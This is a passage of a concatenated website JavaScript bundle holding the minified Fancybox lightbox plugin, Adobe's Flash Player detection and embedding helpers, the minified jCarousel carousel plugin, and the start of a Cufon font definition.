s=new Image;s.onerror=function(){P()};s.onload=function(){s.onerror=null;s.onload=null;Z()};s.src=d;break;case "swf":t='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="'+e.width+'" height="'+e.height+'"><param name="movie" value="'+d+'"></param>';w="";b.each(e.swf,function(r,R){t+='<param name="'+r+'" value="'+R+'"></param>';w+=" "+r+'="'+R+'"'});t+='<embed src="'+d+'" type="application/x-shockwave-flash" width="'+e.width+'" height="'+e.height+'"'+w+"></embed></object>";m.html(t);
F();break;case "ajax":a=d.split("#",2);f=e.ajax.data||{};if(a.length>1){d=a[0];if(typeof f=="string")f+="&selector="+a[1];else f.selector=a[1]}h=false;b.fancybox.showActivity();E=b.ajax(b.extend(e.ajax,{url:d,data:f,error:P,success:function(r){if(E.status==200){m.html(r);F()}}}));break;case "iframe":b('<iframe id="fancybox-frame" name="fancybox-frame'+(new Date).getTime()+'" frameborder="0" hspace="0" scrolling="'+e.scrolling+'" src="'+e.href+'"></iframe>').appendTo(m);N();break}},$=function(){if(u.is(":visible")){b("div",
u).css("top",I*-40+"px");I=(I+1)%12}else clearInterval(H)},aa=function(){if(!b("#fancybox-wrap").length){b("body").append(m=b('<div id="fancybox-tmp"></div>'),u=b('<div id="fancybox-loading"><div></div></div>'),x=b('<div id="fancybox-overlay"></div>'),g=b('<div id="fancybox-wrap"></div>'));if(!b.support.opacity){g.addClass("fancybox-ie");u.addClass("fancybox-ie")}D=b('<div id="fancybox-outer"></div>').append('<div class="fancy-bg" id="fancy-bg-n"></div><div class="fancy-bg" id="fancy-bg-ne"></div><div class="fancy-bg" id="fancy-bg-e"></div><div class="fancy-bg" id="fancy-bg-se"></div><div class="fancy-bg" id="fancy-bg-s"></div><div class="fancy-bg" id="fancy-bg-sw"></div><div class="fancy-bg" id="fancy-bg-w"></div><div class="fancy-bg" id="fancy-bg-nw"></div>').appendTo(g);
D.append(i=b('<div id="fancybox-inner"></div>'),z=b('<a id="fancybox-close"></a>'),A=b('<a href="javascript:;" id="fancybox-left"><span class="fancy-ico" id="fancybox-left-ico"></span></a>'),B=b('<a href="javascript:;" id="fancybox-right"><span class="fancy-ico" id="fancybox-right-ico"></span></a>'));z.click(b.fancybox.close);u.click(b.fancybox.cancel);A.click(function(a){a.preventDefault();b.fancybox.prev()});B.click(function(a){a.preventDefault();b.fancybox.next()});if(O){x.get(0).style.setExpression("height",
"document.body.scrollHeight > document.body.offsetHeight ? document.body.scrollHeight : document.body.offsetHeight + 'px'");u.get(0).style.setExpression("top","(-20 + (document.documentElement.clientHeight ? document.documentElement.clientHeight/2 : document.body.clientHeight/2 ) + ( ignoreMe = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop )) + 'px'");D.prepend('<iframe id="fancybox-hide-sel-frame" src="javascript:\'\';" scrolling="no" frameborder="0" ></iframe>')}}};
b.fn.fancybox=function(a){b(this).data("fancybox",b.extend({},a,b.metadata?b(this).metadata():{})).unbind("click.fb").bind("click.fb",function(d){d.preventDefault();if(!h){h=true;b(this).blur();q=[];p=0;d=b(this).attr("rel")||"";if(!d||d==""||d==="nofollow")q.push(this);else{q=b("a[rel="+d+"], area[rel="+d+"]");p=q.index(this)}C();return false}});return this};b.fancybox=function(a,d){if(!h){h=true;d=typeof d!=="undefined"?d:{};q=[];p=d.index||0;if(b.isArray(a)){for(var f=0,o=a.length;f<o;f++)if(typeof a[f]==
"object")b(a[f]).data("fancybox",b.extend({},d,a[f]));else a[f]=b({}).data("fancybox",b.extend({content:a[f]},d));q=jQuery.merge(q,a)}else{if(typeof a=="object")b(a).data("fancybox",b.extend({},d,a));else a=b({}).data("fancybox",b.extend({content:a},d));q.push(a)}if(p>q.length||p<0)p=0;C()}};b.fancybox.showActivity=function(){clearInterval(H);u.show();H=setInterval($,66)};b.fancybox.hideActivity=function(){u.hide()};b.fancybox.next=function(){return b.fancybox.pos(n+1)};b.fancybox.prev=function(){return b.fancybox.pos(n-
1)};b.fancybox.pos=function(a){if(!h){a=parseInt(a,10);if(a>-1&&j.length>a){p=a;C()}if(c.cyclic&&j.length>1&&a<0){p=j.length-1;C()}if(c.cyclic&&j.length>1&&a>=j.length){p=0;C()}}};b.fancybox.cancel=function(){if(!h){h=true;b.event.trigger("fancybox-cancel");J();e&&b.isFunction(e.onCancel)&&e.onCancel(q,p,e);h=false}};b.fancybox.close=function(){function a(){x.fadeOut("fast");g.hide();b.event.trigger("fancybox-cleanup");i.empty();b.isFunction(c.onClosed)&&c.onClosed(j,n,c);j=e=[];n=p=0;c=e={};h=false}
if(!(h||g.is(":hidden"))){h=true;if(c&&b.isFunction(c.onCleanup))if(c.onCleanup(j,n,c)===false){h=false;return}J();b(z.add(A).add(B)).hide();b("#fancybox-title").remove();g.add(i).add(x).unbind();b(window).unbind("resize.fb scroll.fb");b(document).unbind("keydown.fb");i.css("overflow","hidden");if(c.transitionOut=="elastic"){k=Q();var d=g.position();l={top:d.top,left:d.left,width:g.width(),height:g.height()};if(c.opacity)l.opacity=1;y.prop=1;b(y).animate({prop:0},{duration:c.speedOut,easing:c.easingOut,
step:M,complete:a})}else g.fadeOut(c.transitionOut=="none"?0:c.speedOut,a)}};b.fancybox.resize=function(){var a,d;if(!(h||g.is(":hidden"))){h=true;a=i.wrapInner("<div style='overflow:auto'></div>").children();d=a.height();g.css({height:d+c.padding*2+v});i.css({height:d});a.replaceWith(a.children());b.fancybox.center()}};b.fancybox.center=function(){h=true;var a=K(),d=c.margin,f={};f.top=a[3]+(a[1]-(g.height()-v+40))*0.5;f.left=a[2]+(a[0]-(g.width()+40))*0.5;f.top=Math.max(a[3]+d,f.top);f.left=Math.max(a[2]+
d,f.left);g.css(f);h=false};b.fn.fancybox.defaults={padding:0,margin:20,opacity:false,modal:false,cyclic:false,scrolling:"auto",width:560,height:340,autoScale:true,autoDimensions:true,centerOnScroll:false,ajax:{},swf:{wmode:"transparent"},hideOnOverlayClick:true,hideOnContentClick:false,overlayShow:true,overlayOpacity:0.3,overlayColor:"#666",titleShow:true,titlePosition:"outside",titleFormat:null,transitionIn:"fade",transitionOut:"fade",speedIn:300,speedOut:300,changeSpeed:300,changeFade:"fast",
easingIn:"swing",easingOut:"swing",showCloseButton:true,showNavArrows:true,enableEscapeButton:true,onStart:null,onCancel:null,onComplete:null,onCleanup:null,onClosed:null};b(document).ready(function(){aa()})})(jQuery);






// Flash Player Version Detection - Rev 1.6
// Detect Client Browser type
// Copyright(c) 2005-2006 Adobe Macromedia Software, LLC. All rights reserved.
var isIE  = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;

function ControlVersion()
{
	var version;
	var axo;
	var e;

	// NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry

	try {
		// version will be set for 7.X or greater players
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
		version = axo.GetVariable("$version");
	} catch (e) {
	}

	if (!version)
	{
		try {
			// version will be set for 6.X players only
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");

			// installed player is some revision of 6.0
			// GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,
			// so we have to be careful.

			// default to the first public version
			version = "WIN 6,0,21,0";

			// throws if AllowScripAccess does not exist (introduced in 6.0r47)
			axo.AllowScriptAccess = "always";

			// safe to call for 6.0r47 or greater
			version = axo.GetVariable("$version");

		} catch (e) {
		}
	}

	if (!version)
	{
		try {
			// version will be set for 4.X or 5.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
			version = axo.GetVariable("$version");
		} catch (e) {
		}
	}

	if (!version)
	{
		try {
			// version will be set for 3.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
			version = "WIN 3,0,18,0";
		} catch (e) {
		}
	}

	if (!version)
	{
		try {
			// version will be set for 2.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
			version = "WIN 2,0,0,11";
		} catch (e) {
			version = -1;
		}
	}

	return version;
}

// JavaScript helper required to detect Flash Player PlugIn version information
function GetSwfVer(){
	// NS/Opera version >= 3 check for Flash plugin in plugin array
	var flashVer = -1;

	if (navigator.plugins != null && navigator.plugins.length > 0) {
		if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
			var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
			var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
			var descArray = flashDescription.split(" ");
			var tempArrayMajor = descArray[2].split(".");
			var versionMajor = tempArrayMajor[0];
			var versionMinor = tempArrayMajor[1];
			var versionRevision = descArray[3];
			if (versionRevision == "") {
				versionRevision = descArray[4];
			}
			if (versionRevision[0] == "d") {
				versionRevision = versionRevision.substring(1);
			} else if (versionRevision[0] == "r") {
				versionRevision = versionRevision.substring(1);
				if (versionRevision.indexOf("d") > 0) {
					versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
				}
			} else if (versionRevision[0] == "b") {
				versionRevision = versionRevision.substring(1);
			}
			var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
		}
	}
	// MSN/WebTV 2.6 supports Flash 4
	else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
	// WebTV 2.5 supports Flash 3
	else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
	// older WebTV supports Flash 2
	else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
	else if ( isIE && isWin && !isOpera ) {
		flashVer = ControlVersion();
	}
	return flashVer;
}

// When called with reqMajorVer, reqMinorVer, reqRevision returns true if that version or greater is available
function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision)
{
	versionStr = GetSwfVer();
	if (versionStr == -1 ) {
		return false;
	} else if (versionStr != 0) {
		if(isIE && isWin && !isOpera) {
			// Given "WIN 2,0,0,11"
			tempArray         = versionStr.split(" "); 	// ["WIN", "2,0,0,11"]
			tempString        = tempArray[1];			// "2,0,0,11"
			versionArray      = tempString.split(",");	// ['2', '0', '0', '11']
		} else {
			versionArray      = versionStr.split(".");
		}
		var versionMajor      = versionArray[0];
		var versionMinor      = versionArray[1];
		var versionRevision   = versionArray[2];

        	// is the major.revision >= requested major.revision AND the minor version >= requested minor
		if (versionMajor > parseFloat(reqMajorVer)) {
			return true;
		} else if (versionMajor == parseFloat(reqMajorVer)) {
			if (versionMinor > parseFloat(reqMinorVer))
				return true;
			else if (versionMinor == parseFloat(reqMinorVer)) {
				if (versionRevision >= parseFloat(reqRevision))
					return true;
			}
		}
		return false;
	}
}

function AC_AddExtension(src, ext)
{
  var qIndex = src.indexOf('?');
  if ( qIndex != -1)
  {
    // Add the extention (if needed) before the query params
    var path = src.substring(0, qIndex);
    if (path.length >= ext.length && path.lastIndexOf(ext) == (path.length - ext.length))
      return src;
    else
      return src.replace(/\?/, ext+'?');
  }
  else
  {
    // Add the extension (if needed) to the end of the URL
    if (src.length >= ext.length && src.lastIndexOf(ext) == (src.length - ext.length))
      return src;  // Already have extension
    else
      return src + ext;
  }
}

function AC_Generateobj(objAttrs, params, embedAttrs)
{
    var str = '';
    if (isIE && isWin && !isOpera)
    {
  		str += '<object ';
  		for (var i in objAttrs)
  			str += i + '="' + objAttrs[i] + '" ';
  		str += '>';
  		for (var i in params)
  			str += '<param name="' + i + '" value="' + params[i] + '" /> ';
  		str += '</object>';
    } else {
  		str += '<embed ';
  		for (var i in embedAttrs)
  			str += i + '="' + embedAttrs[i] + '" ';
  		str += '> </embed>';
    }

    document.write(str);
}

function AC_FL_RunContent(){
  var ret =
    AC_GetArgs
    (  arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
     , "application/x-shockwave-flash"
    );
  AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}

function AC_GetArgs(args, ext, srcParamName, classid, mimeType){
  var ret = new Object();
  ret.embedAttrs = new Object();
  ret.params = new Object();
  ret.objAttrs = new Object();
  for (var i=0; i < args.length; i=i+2){
    var currArg = args[i].toLowerCase();

    switch (currArg){
      case "classid":
        break;
      case "pluginspage":
        ret.embedAttrs[args[i]] = args[i+1];
        break;
      case "src":
      case "movie":
        args[i+1] = AC_AddExtension(args[i+1], ext);
        ret.embedAttrs["src"] = args[i+1];
        ret.params[srcParamName] = args[i+1];
        break;
      case "onafterupdate":
      case "onbeforeupdate":
      case "onblur":
      case "oncellchange":
      case "onclick":
      case "ondblClick":
      case "ondrag":
      case "ondragend":
      case "ondragenter":
      case "ondragleave":
      case "ondragover":
      case "ondrop":
      case "onfinish":
      case "onfocus":
      case "onhelp":
      case "onmousedown":
      case "onmouseup":
      case "onmouseover":
      case "onmousemove":
      case "onmouseout":
      case "onkeypress":
      case "onkeydown":
      case "onkeyup":
      case "onload":
      case "onlosecapture":
      case "onpropertychange":
      case "onreadystatechange":
      case "onrowsdelete":
      case "onrowenter":
      case "onrowexit":
      case "onrowsinserted":
      case "onstart":
      case "onscroll":
      case "onbeforeeditfocus":
      case "onactivate":
      case "onbeforedeactivate":
      case "ondeactivate":
      case "type":
      case "codebase":
        ret.objAttrs[args[i]] = args[i+1];
        break;
      case "id":
      case "width":
      case "height":
      case "align":
      case "vspace":
      case "hspace":
      case "class":
      case "title":
      case "accesskey":
      case "name":
      case "tabindex":
        ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1];
        break;
      default:
        ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
    }
  }
  ret.objAttrs["classid"] = classid;
  if (mimeType) ret.embedAttrs["type"] = mimeType;
  return ret;
}








/*!
 * jCarousel - Riding carousels with jQuery
 *   http://sorgalla.com/jcarousel/
 *
 * Copyright (c) 2006 Jan Sorgalla (http://sorgalla.com)
 * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
 * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
 *
 * Built on top of the jQuery library
 *   http://jquery.com
 *
 * Inspired by the "Carousel Component" by Bill Scott
 *   http://billwscott.com/carousel/
 */

(function(i){i.fn.jcarousel=function(a){if(typeof a=="string"){var c=i(this).data("jcarousel"),b=Array.prototype.slice.call(arguments,1);return c[a].apply(c,b)}else return this.each(function(){i(this).data("jcarousel",new h(this,a))})};var p={vertical:false,rtl:false,start:1,offset:1,size:null,scroll:3,visible:null,animation:"normal",easing:"swing",auto:0,wrap:null,initCallback:null,reloadCallback:null,itemLoadCallback:null,itemFirstInCallback:null,itemFirstOutCallback:null,itemLastInCallback:null, itemLastOutCallback:null,itemVisibleInCallback:null,itemVisibleOutCallback:null,buttonNextHTML:"<div></div>",buttonPrevHTML:"<div></div>",buttonNextEvent:"click",buttonPrevEvent:"click",buttonNextCallback:null,buttonPrevCallback:null,itemFallbackDimension:null},q=false;i(window).bind("load.jcarousel",function(){q=true});i.jcarousel=function(a,c){this.options=i.extend({},p,c||{});this.locked=false;this.buttonPrev=this.buttonNext=this.list=this.clip=this.container=null;if(!c||c.rtl===undefined)this.options.rtl= (i(a).attr("dir")||i("html").attr("dir")||"").toLowerCase()=="rtl";this.wh=!this.options.vertical?"width":"height";this.lt=!this.options.vertical?this.options.rtl?"right":"left":"top";for(var b="",d=a.className.split(" "),e=0;e<d.length;e++)if(d[e].indexOf("jcarousel-skin")!=-1){i(a).removeClass(d[e]);b=d[e];break}if(a.nodeName.toUpperCase()=="UL"||a.nodeName.toUpperCase()=="OL"){this.list=i(a);this.container=this.list.parent();if(this.container.hasClass("jcarousel-clip")){if(!this.container.parent().hasClass("jcarousel-container"))this.container= this.container.wrap("<div></div>");this.container=this.container.parent()}else if(!this.container.hasClass("jcarousel-container"))this.container=this.list.wrap("<div></div>").parent()}else{this.container=i(a);this.list=this.container.find("ul,ol").eq(0)}b!=""&&this.container.parent()[0].className.indexOf("jcarousel-skin")==-1&&this.container.wrap('<div class=" '+b+'"></div>');this.clip=this.list.parent();if(!this.clip.length||!this.clip.hasClass("jcarousel-clip"))this.clip=this.list.wrap("<div></div>").parent(); this.buttonNext=i(".jcarousel-next",this.container);if(this.buttonNext.size()==0&&this.options.buttonNextHTML!=null)this.buttonNext=this.clip.after(this.options.buttonNextHTML).next();this.buttonNext.addClass(this.className("jcarousel-next"));this.buttonPrev=i(".jcarousel-prev",this.container);if(this.buttonPrev.size()==0&&this.options.buttonPrevHTML!=null)this.buttonPrev=this.clip.after(this.options.buttonPrevHTML).next();this.buttonPrev.addClass(this.className("jcarousel-prev"));this.clip.addClass(this.className("jcarousel-clip")).css({overflow:"hidden", position:"relative"});this.list.addClass(this.className("jcarousel-list")).css({overflow:"hidden",position:"relative",top:0,margin:0,padding:0}).css(this.options.rtl?"right":"left",0);this.container.addClass(this.className("jcarousel-container")).css({position:"relative"});!this.options.vertical&&this.options.rtl&&this.container.addClass("jcarousel-direction-rtl").attr("dir","rtl");var f=this.options.visible!=null?Math.ceil(this.clipping()/this.options.visible):null;b=this.list.children("li");var g= this;if(b.size()>0){var j=0;e=this.options.offset;b.each(function(){g.format(this,e++);j+=g.dimension(this,f)});this.list.css(this.wh,j+100+"px");if(!c||c.size===undefined)this.options.size=b.size()}this.container.css("display","block");this.buttonNext.css("display","block");this.buttonPrev.css("display","block");this.funcNext=function(){g.next()};this.funcPrev=function(){g.prev()};this.funcResize=function(){g.reload()};this.options.initCallback!=null&&this.options.initCallback(this,"init");if(!q&& i.browser.safari){this.buttons(false,false);i(window).bind("load.jcarousel",function(){g.setup()})}else this.setup()};var h=i.jcarousel;h.fn=h.prototype={jcarousel:"0.2.5"};h.fn.extend=h.extend=i.extend;h.fn.extend({setup:function(){this.prevLast=this.prevFirst=this.last=this.first=null;this.animating=false;this.tail=this.timer=null;this.inTail=false;if(!this.locked){this.list.css(this.lt,this.pos(this.options.offset)+"px");var a=this.pos(this.options.start);this.prevFirst=this.prevLast=null;this.animate(a, false);i(window).unbind("resize.jcarousel",this.funcResize).bind("resize.jcarousel",this.funcResize)}},reset:function(){this.list.empty();this.list.css(this.lt,"0px");this.list.css(this.wh,"10px");this.options.initCallback!=null&&this.options.initCallback(this,"reset");this.setup()},reload:function(){this.tail!=null&&this.inTail&&this.list.css(this.lt,h.intval(this.list.css(this.lt))+this.tail);this.tail=null;this.inTail=false;this.options.reloadCallback!=null&&this.options.reloadCallback(this);if(this.options.visible!= null){var a=this,c=Math.ceil(this.clipping()/this.options.visible),b=0,d=0;this.list.children("li").each(function(e){b+=a.dimension(this,c);if(e+1<a.first)d=b});this.list.css(this.wh,b+"px");this.list.css(this.lt,-d+"px")}this.scroll(this.first,false)},lock:function(){this.locked=true;this.buttons()},unlock:function(){this.locked=false;this.buttons()},size:function(a){if(a!=undefined){this.options.size=a;this.locked||this.buttons()}return this.options.size},has:function(a,c){if(c==undefined||!c)c= a;if(this.options.size!==null&&c>this.options.size)c=this.options.size;for(var b=a;b<=c;b++){var d=this.get(b);if(!d.length||d.hasClass("jcarousel-item-placeholder"))return false}return true},get:function(a){return i(".jcarousel-item-"+a,this.list)},add:function(a,c){var b=this.get(a),d=0,e=i(c);if(b.length==0){var f;b=this.create(a);for(var g=h.intval(a);f=this.get(--g);)if(g<=0||f.length){g<=0?this.list.prepend(b):f.after(b);break}}else d=this.dimension(b);if(e.get(0).nodeName.toUpperCase()=="LI"){b.replaceWith(e); b=e}else b.empty().append(c);this.format(b.removeClass(this.className("jcarousel-item-placeholder")),a);e=this.options.visible!=null?Math.ceil(this.clipping()/this.options.visible):null;d=this.dimension(b,e)-d;a>0&&a<this.first&&this.list.css(this.lt,h.intval(this.list.css(this.lt))-d+"px");this.list.css(this.wh,h.intval(this.list.css(this.wh))+d+"px");return b},remove:function(a){var c=this.get(a);if(!(!c.length||a>=this.first&&a<=this.last)){var b=this.dimension(c);a<this.first&&this.list.css(this.lt, h.intval(this.list.css(this.lt))+b+"px");c.remove();this.list.css(this.wh,h.intval(this.list.css(this.wh))-b+"px")}},next:function(){this.stopAuto();this.tail!=null&&!this.inTail?this.scrollTail(false):this.scroll((this.options.wrap=="both"||this.options.wrap=="last")&&this.options.size!=null&&this.last==this.options.size?1:this.first+this.options.scroll)},prev:function(){this.stopAuto();this.tail!=null&&this.inTail?this.scrollTail(true):this.scroll((this.options.wrap=="both"||this.options.wrap== "first")&&this.options.size!=null&&this.first==1?this.options.size:this.first-this.options.scroll)},scrollTail:function(a){if(!(this.locked||this.animating||!this.tail)){var c=h.intval(this.list.css(this.lt));!a?c-=this.tail:c+=this.tail;this.inTail=!a;this.prevFirst=this.first;this.prevLast=this.last;this.animate(c)}},scroll:function(a,c){this.locked||this.animating||this.animate(this.pos(a),c)},pos:function(a){var c=h.intval(this.list.css(this.lt));if(this.locked||this.animating)return c;if(this.options.wrap!= "circular")a=a<1?1:this.options.size&&a>this.options.size?this.options.size:a;for(var b=this.first>a,d=this.options.wrap!="circular"&&this.first<=1?1:this.first,e=b?this.get(d):this.get(this.last),f=b?d:d-1,g=null,j=0,l=false,k=0;b?--f>=a:++f<a;){g=this.get(f);l=!g.length;if(g.length==0){g=this.create(f).addClass(this.className("jcarousel-item-placeholder"));e[b?"before":"after"](g);if(this.first!=null&&this.options.wrap=="circular"&&this.options.size!==null&&(f<=0||f>this.options.size)){e=this.get(this.index(f)); if(e.length)g=this.add(f,e.clone(true))}}e=g;k=this.dimension(g);if(l)j+=k;if(this.first!=null&&(this.options.wrap=="circular"||f>=1&&(this.options.size==null||f<=this.options.size)))c=b?c+k:c-k}d=this.clipping();var o=[],n=0;f=a;var m=0;for(e=this.get(a-1);++n;){g=this.get(f);l=!g.length;if(g.length==0){g=this.create(f).addClass(this.className("jcarousel-item-placeholder"));e.length==0?this.list.prepend(g):e[b?"before":"after"](g);if(this.first!=null&&this.options.wrap=="circular"&&this.options.size!== null&&(f<=0||f>this.options.size)){e=this.get(this.index(f));if(e.length)g=this.add(f,e.clone(true))}}e=g;k=this.dimension(g);if(k==0)throw Error("jCarousel: No width/height set for items. This will cause an infinite loop. Aborting...");if(this.options.wrap!="circular"&&this.options.size!==null&&f>this.options.size)o.push(g);else if(l)j+=k;m+=k;if(m>=d)break;f++}for(g=0;g<o.length;g++)o[g].remove();if(j>0){this.list.css(this.wh,this.dimension(this.list)+j+"px");if(b){c-=j;this.list.css(this.lt,h.intval(this.list.css(this.lt))- j+"px")}}j=a+n-1;if(this.options.wrap!="circular"&&this.options.size&&j>this.options.size)j=this.options.size;if(f>j){n=0;f=j;for(m=0;++n;){g=this.get(f--);if(!g.length)break;m+=this.dimension(g);if(m>=d)break}}f=j-n+1;if(this.options.wrap!="circular"&&f<1)f=1;if(this.inTail&&b){c+=this.tail;this.inTail=false}this.tail=null;if(this.options.wrap!="circular"&&j==this.options.size&&j-n+1>=1){b=h.margin(this.get(j),!this.options.vertical?"marginRight":"marginBottom");if(m-b>d)this.tail=m-d-b}for(;a-- > f;)c+=this.dimension(this.get(a));this.prevFirst=this.first;this.prevLast=this.last;this.first=f;this.last=j;return c},animate:function(a,c){if(!(this.locked||this.animating)){this.animating=true;var b=this,d=function(){b.animating=false;a==0&&b.list.css(b.lt,0);if(b.options.wrap=="circular"||b.options.wrap=="both"||b.options.wrap=="last"||b.options.size==null||b.last<b.options.size)b.startAuto();b.buttons();b.notify("onAfterAnimation");if(b.options.wrap=="circular"&&b.options.size!==null)for(var e= b.prevFirst;e<=b.prevLast;e++)if(e!==null&&!(e>=b.first&&e<=b.last)&&(e<1||e>b.options.size))b.remove(e)};this.notify("onBeforeAnimation");if(!this.options.animation||c==false){this.list.css(this.lt,a+"px");d()}else this.list.animate(!this.options.vertical?this.options.rtl?{right:a}:{left:a}:{top:a},this.options.animation,this.options.easing,d)}},startAuto:function(a){if(a!=undefined)this.options.auto=a;if(this.options.auto==0)return this.stopAuto();if(this.timer==null){var c=this;this.timer=setTimeout(function(){c.next()}, this.options.auto*1E3)}},stopAuto:function(){if(this.timer!=null){clearTimeout(this.timer);this.timer=null}},buttons:function(a,c){if(a==undefined||a==null){a=!this.locked&&this.options.size!==0&&(this.options.wrap&&this.options.wrap!="first"||this.options.size==null||this.last<this.options.size);if(!this.locked&&(!this.options.wrap||this.options.wrap=="first")&&this.options.size!=null&&this.last>=this.options.size)a=this.tail!=null&&!this.inTail}if(c==undefined||c==null){c=!this.locked&&this.options.size!== 0&&(this.options.wrap&&this.options.wrap!="last"||this.first>1);if(!this.locked&&(!this.options.wrap||this.options.wrap=="last")&&this.options.size!=null&&this.first==1)c=this.tail!=null&&this.inTail}var b=this;this.buttonNext[a?"bind":"unbind"](this.options.buttonNextEvent+".jcarousel",this.funcNext)[a?"removeClass":"addClass"](this.className("jcarousel-next-disabled")).attr("disabled",a?false:true);this.buttonPrev[c?"bind":"unbind"](this.options.buttonPrevEvent+".jcarousel",this.funcPrev)[c?"removeClass": "addClass"](this.className("jcarousel-prev-disabled")).attr("disabled",c?false:true);this.options.buttonNextCallback!=null&&this.buttonNext.data("jcarouselstate")!=a&&this.buttonNext.each(function(){b.options.buttonNextCallback(b,this,a)}).data("jcarouselstate",a);this.options.buttonPrevCallback!=null&&this.buttonPrev.data("jcarouselstate")!=c&&this.buttonPrev.each(function(){b.options.buttonPrevCallback(b,this,c)}).data("jcarouselstate",c)},notify:function(a){var c=this.prevFirst==null?"init":this.prevFirst< this.first?"next":"prev";this.callback("itemLoadCallback",a,c);if(this.prevFirst!==this.first){this.callback("itemFirstInCallback",a,c,this.first);this.callback("itemFirstOutCallback",a,c,this.prevFirst)}if(this.prevLast!==this.last){this.callback("itemLastInCallback",a,c,this.last);this.callback("itemLastOutCallback",a,c,this.prevLast)}this.callback("itemVisibleInCallback",a,c,this.first,this.last,this.prevFirst,this.prevLast);this.callback("itemVisibleOutCallback",a,c,this.prevFirst,this.prevLast, this.first,this.last)},callback:function(a,c,b,d,e,f,g){if(!(this.options[a]==undefined||typeof this.options[a]!="object"&&c!="onAfterAnimation")){var j=typeof this.options[a]=="object"?this.options[a][c]:this.options[a];if(i.isFunction(j)){var l=this;if(d===undefined)j(l,b,c);else if(e===undefined)this.get(d).each(function(){j(l,this,d,b,c)});else for(var k=d;k<=e;k++)k!==null&&!(k>=f&&k<=g)&&this.get(k).each(function(){j(l,this,k,b,c)})}}},create:function(a){return this.format("<li></li>",a)},format:function(a, c){a=i(a);for(var b=a.get(0).className.split(" "),d=0;d<b.length;d++)b[d].indexOf("jcarousel-")!=-1&&a.removeClass(b[d]);a.addClass(this.className("jcarousel-item")).addClass(this.className("jcarousel-item-"+c)).css({"float":this.options.rtl?"right":"left","list-style":"none"}).attr("jcarouselindex",c);return a},className:function(a){return a+" "+a+(!this.options.vertical?"-horizontal":"-vertical")},dimension:function(a,c){var b=a.jquery!=undefined?a[0]:a,d=!this.options.vertical?(b.offsetWidth|| h.intval(this.options.itemFallbackDimension))+h.margin(b,"marginLeft")+h.margin(b,"marginRight"):(b.offsetHeight||h.intval(this.options.itemFallbackDimension))+h.margin(b,"marginTop")+h.margin(b,"marginBottom");if(c==undefined||d==c)return d;d=!this.options.vertical?c-h.margin(b,"marginLeft")-h.margin(b,"marginRight"):c-h.margin(b,"marginTop")-h.margin(b,"marginBottom");i(b).css(this.wh,d+"px");return this.dimension(b)},clipping:function(){return!this.options.vertical?this.clip[0].offsetWidth-h.intval(this.clip.css("borderLeftWidth"))- h.intval(this.clip.css("borderRightWidth")):this.clip[0].offsetHeight-h.intval(this.clip.css("borderTopWidth"))-h.intval(this.clip.css("borderBottomWidth"))},index:function(a,c){if(c==undefined)c=this.options.size;return Math.round(((a-1)/c-Math.floor((a-1)/c))*c)+1}});h.extend({defaults:function(a){return i.extend(p,a||{})},margin:function(a,c){if(!a)return 0;var b=a.jquery!=undefined?a[0]:a;if(c=="marginRight"&&i.browser.safari){var d={display:"block","float":"none",width:"auto"},e,f;i.swap(b,d, function(){e=b.offsetWidth});d.marginRight=0;i.swap(b,d,function(){f=b.offsetWidth});return f-e}return h.intval(i.css(b,c))},intval:function(a){a=parseInt(a);return isNaN(a)?0:a}})})(jQuery);











/*!
 * The following copyright notice may not be removed under any circumstances.
 *
 * Copyright:
 * CZ-3.0, 1990 Adobe Systems Inc., 2003 Quentin spol. s r.o.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"55,0r-30,0r0,-186r30,0r0,186xm-15,-206r37,-51r34,0r37,51r-29,0r-25,-34r-25,34r-29,0","w":79},{"d":"98,-25v72,0,77,-137,2,-138v-39,0,-55,31,-55,67v0,33,13,71,53,71xm184,-186v-7,109,35,262,-87,262v-35,0,-75,-14,-77,-55r31,0v1,22,28,30,48,30v44,1,61,-37,55,-83v-10,23,-35,34,-58,34v-55,0,-83,-43,-83,-94v0,-44,22,-98,86,-98v24,-1,43,12,56,31r0,-27r29,0xm44,-257r18,0v6,20,20,30,41,30v21,0,28,-12,35,-30r19,0v-5,31,-25,50,-57,50v-33,0,-51,-18,-56,-50","w":206},{"d":"152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52xm155,-257r-37,51r-33,0r-38,-51r29,0r25,35r25,-35r29,0","w":193},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0xm151,-271r0,-38r32,0r0,38r-32,0xm79,-271r0,-38r32,0r0,38r-32,0","w":259},{"d":"23,0r0,-186r29,0v1